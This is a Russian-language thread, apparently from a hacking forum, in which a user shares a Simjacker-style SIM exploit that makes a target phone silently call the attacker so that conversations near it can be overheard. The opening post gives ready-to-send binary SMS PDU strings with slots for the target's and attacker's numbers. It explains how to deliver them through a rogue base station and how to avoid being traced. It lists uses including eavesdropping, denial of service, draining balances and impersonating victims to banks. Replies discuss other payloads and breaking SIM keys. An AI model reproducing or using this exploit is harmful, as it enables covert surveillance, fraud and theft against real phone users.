• XSS.stack #1 – первый литературный журнал от юзеров форума

GSM GSM-эксплоит "страшный сон параноика"

gliderexpert

CPU register
Забанен
Регистрация
17.02.2021
Сообщения
1 440
Решения
1
Реакции
2 336
Пожалуйста, обратите внимание, что пользователь заблокирован
Все слышали сказки, что можно прослушивать помещение через лежащий в нем мобильный телефон?
Так вот, могу вас обрадовать - "мы рождены, чтоб сказку сделать былью!"
Представляю вашему вниманию - способ заставить телефон цели - самостоятельно позвонить на нужный "исследователю информационной безопасности", номер. После чего хакер может "снять трубку" и прослушать все, что происходит рядом с целью.

Суть атаки - хакер отправляет бинарную SMS на телефон цели. SMS содержит специальную полезную нагрузку, исполняемую операционной системой сим-карты телефона, которая инициирует исходящий вызов через механизм "S@t setup call". На большинстве телефонов участие абонента не требуется, внешние признаки - кратковременное включение подсветки дисплея. Некоторые телефоны отображают сообщение "Подтвердить вызов?" , при нажатии абонентом "да", экран выключается и устанавливается исходящее соединение.
Хакер "поднимает трубку" на своем телефоне, и далее может прослушивать все происходящее рядом с телефоном жертвы. Длительность сеанса прослушивания - зависит от настроек оператора связи (длительность открытой голосовой сессии) и обычно составляет 1 час. После чего требуется повторная отправка SMS.

Текст PDU команды -
0x042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00
где 2143658709F0 - номер телефона хакера в формате GSM 7bit (в данном случае +12345678900) .
Свой номер можно подставить при помощи вот этого конвертера http://rednaxela.net/pdu.php

Полный текст SMS для отправки через SMPP шлюз выглядит так:
0041000B912143658709F07FF63802700000330D0000000050534800000000000042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00
первые 2143658709F0 -
телефон цели
вторые, в конце сообщения 2143658709F0 - телефон хакера
Проверить собранный пакет можно тут - https://www.smsdeliverer.com/online-sms-pdu-decoder.aspx

Операторы сотовой связи естественно фильтруют такие СМСки. Поэтому, отправляем их через собственный эмулятор базовой станции по принципу - изложенному в моей предыдущей теме . Если кратко - то сажаем абонента на свою БС, отправляем ему волшебную СМСку и сразу отключаем эмулятор БС. Абонент выполняет реселект на "легальную" городскую сеть, и команда call setup выполняется уже через обычного оператора.
Развлекайтесь осторожно, не подставляйте в apdu команду свои "чистые" номера, т.к. эти исходящие звонки логгируются у оператора и номер будет засвечен со 100% вероятностью.
Эксплоит не 100-процентный! Работает не на всех телефонах и симкартах, некоторые смартфоны показывают сообщение с требованием подтвердить вызов - но штука прикольная и рекомендуется к освоению хотя бы для того чтобы понимать возможные векторы атак на ваш телефон.

Практические варианты применения:
- прослушивание происходящего рядом с телефоном без ведома абонента
- массовая длительная рассылка таких apdu СМС с целью DDOS атаки на конкретный телефон
- можно оставить абонента без связи, позвонив на роуминговый номер и израсходовав его баланс
- можно создать платный, контентный номер телефона и инициировать звонки на него - не знаю, работает ли сейчас эта схема

Очень интересно возможно ли совместить эту схему с конференц-вызовами. Например, инициировать звонок с тлф цели в банк, по конференц связи подключить туда параллельно свою линию, после чего поговорить с банком от лица жертвы. Как думаете, насколько это реально?
 
Последнее редактирование:
Этот парень п1zдец годные вещи пишет. Не много кто понимает описанное, но достаточно и тех, кто понимает. Продолжай, очень хорошее дело делаешь.
Лайк как нибудь поставлю, сегодня лимит реакций.
 
Текст PDU команды -
Думаю стоит раскрыть подробнее тему с отправкой PDU...

Очень уж любопытно внезапно стало что там соседи обо мне думают)
 
Последнее редактирование:
Пару лет назад читал про эту уязвимость здесь но они поспешили удалить этот пост. Смысл в том что можно внедрять команды прямо в ядро системы...
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Думаю стоит раскрыть подробнее тему с отправкой PDU...
все уже есть тут https://xss.pro/threads/73468/
Кстати для прослушивания можно не отцеплять абонента от своей базовой станции, он может по внутренней сети перезванивать, это менее палевно чем звонок через оператора на какой-то реально существующий телефон.
 
Нужна статья как собрать свою бс с минимальными усилиями)

Можем сколабиться:
с меня железо и документирование процесса + гит и инстал может какие то скрипты(или вм\образ фс))
От тебя уже экспертиза и помощь с конфигами
 
Пожалуйста, обратите внимание, что пользователь заблокирован
да этих статей "как запустить бс на моторола" миллион в интернете, на том же хабре штук 5 наверно...
 
Это уязвимость ОС SIM-карты? Т.е. мы можем сделать другой пейлоад, не обязательно с прослушкой? Или это встроенный функционал от оператора?
Кстати, где можно посмотреть доки на SIM? То ли меня в гугле забанили, то ли это не так легко ищется..
Вообще интересна тема, что можно делать со своей SIM.. Вот там есть приложения, которые оператор записал. Но своё приложение на свою симкарту хрен запилишь - оператор закрывает такую возможность (или не оператор?). А как устроен механизм этой защиты?
 
да этих статей "как запустить бс на моторола" миллион в интернете, на том же хабре штук 5 наверно...
Видимо из-за большого спектра и нет возможности + тематика закрыта и дает такой эфект что много статей и по факту собрать бс становится не просто)
Я говорю про ман какой то актуальный на сегодняшний день с доступным железом
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Это уязвимость ОС SIM-карты? Т.е. мы можем сделать другой пейлоад, не обязательно с прослушкой? Или это встроенный функционал от оператора?

Уязвимость симкарты. Можно писать разный payload вплоть до специальных прошивок симки, которые будут вычитывать телефонную книгу абонента, передавать ключи gsm сессии и т.д.

Кстати, где можно посмотреть доки на SIM? То ли меня в гугле забанили, то ли это не так легко ищется..

https://simjacker.com/ , https://xakep.ru/2019/09/13/simjacker/ , https://www.kaspersky.ru/blog/simjacker-sim-espionage/23721/
и далее по ключевым словам и ссылкам из списков используемой литературы

Основа тут

Вообще интересна тема, что можно делать со своей SIM.. Вот там есть приложения, которые оператор записал. Но своё приложение на свою симкарту хрен запилишь - оператор закрывает такую возможность (или не оператор?). А как устроен механизм этой защиты?

DES шифрование, при помощи мощного компьютера или плис ломается в реальном времени.


Видимо из-за большого спектра и нет возможности + тематика закрыта

Ничего не закрыто, все в общем доступе совершенно свободно, без регистрации и смс!

и дает такой эфект что много статей и по факту собрать бс становится не просто)
Я говорю про ман какой то актуальный на сегодняшний день с доступным железом

Да все актуальны, железо - куда уж доступнее чем телефон моторола за 10$.
куда уж проще https://habr.com/ru/companies/pentestit/articles/331406/
 
Очень интересно возможно ли совместить эту схему с конференц-вызовами. Например, инициировать звонок с тлф цели в банк, по конференц связи подключить туда параллельно свою линию, после чего поговорить с банком от лица жертвы. Как думаете, насколько это реально?
Вставлю свои пять копеек, может быть подтолкнет к поиску решения:
Знаю за тему транзита на телефонах связанных с АТС, суть заключается в том что на промежуточном абоненте нужно поменять порядок передачи потоков Е1 с "входящий -> прием" на "входящий -> в линию", на каком канальном интервале это реализуется уже точно не скажу. Если есть хотя бы гипотетическая возможность заставить телефон жертвы СМСкой сделать тоже самое переключение "входящий -> в линию", то почему нет, потому что программно такая возможность есть 100% =)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Интересная тема, возможно ли это сделать, отправив его через смс-шлюз (ожидая, что он не будет отфильтрован)?
 
Интересная тема, возможно ли это сделать, отправив его через смс-шлюз (ожидая, что он не будет отфильтрован)?
как оказалось, невозможно в большинстве стран
 
Пожалуйста, обратите внимание, что пользователь заблокирован
как оказалось, невозможно в большинстве стран
Существует также подобный эксплойт, пару месяцев назад мой друг был взломан таким же образом, его взломало правоохранительное агентство с помощью текстового сообщения, отправив все его нажатия клавиш обратно, он увидел это в своих файлах.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Вставлю свои пять копеек, может быть подтолкнет к поиску решения:
Знаю за тему транзита на телефонах связанных с АТС, суть заключается в том что на промежуточном абоненте нужно поменять порядок передачи потоков Е1 с "входящий -> прием" на "входящий -> в линию", на каком канальном интервале это реализуется уже точно не скажу. Если есть хотя бы гипотетическая возможность заставить телефон жертвы СМСкой сделать тоже самое переключение "входящий -> в линию", то почему нет, потому что программно такая возможность есть 100% =)

Veil , можешь это как-нибудь прокомментировать?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Veil , можешь это как-нибудь прокомментировать?
Ты знаешь, я ничего не понял. Е1 поток и телефон какая тут связь? Что он имеет ввиду под "промежуточный абонент"? Транзитную АТС? Маршрутизацию на АТС? Тут какой-то набор слов.
И что такое канальный интервал?
Е1 поток это 30 голосовых каналов + 1 сигнальный + 1 синхронизирующий. Что и где он хочет менять?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ты знаешь, я ничего не понял. Е1 поток и телефон какая тут связь? Что он имеет ввиду под "промежуточный абонент"? Транзитную АТС? Маршрутизацию на АТС? Тут какой-то набор слов.
И что такое канальный интервал?
Е1 поток это 30 голосовых каналов + 1 сигнальный + 1 синхронизирующий. Что и где он хочет менять?

Да я честно говоря тоже не совсем понял о чем речь, возможно речь про манипуляцию некими маршрутами на е1-шлюзе, но... короче моих знаний не хватает, я больше в вопросах радиодоступа разбираюсь.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
возможно речь про манипуляцию некими маршрутами на е1-шлюзе
Маршрутизацию можно изменить на АТС, что бы соеденить с другим абонентом. Но как прослушать проводной телефон или сип телефон я не знаю. Разговор абонентов легко, а квартиру... Даже в голову ничего не приходит. Как командой с АТС механически снять трубку? А по другому не получится, там стоят или релейные контакты, или геркон, или фотодиод.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх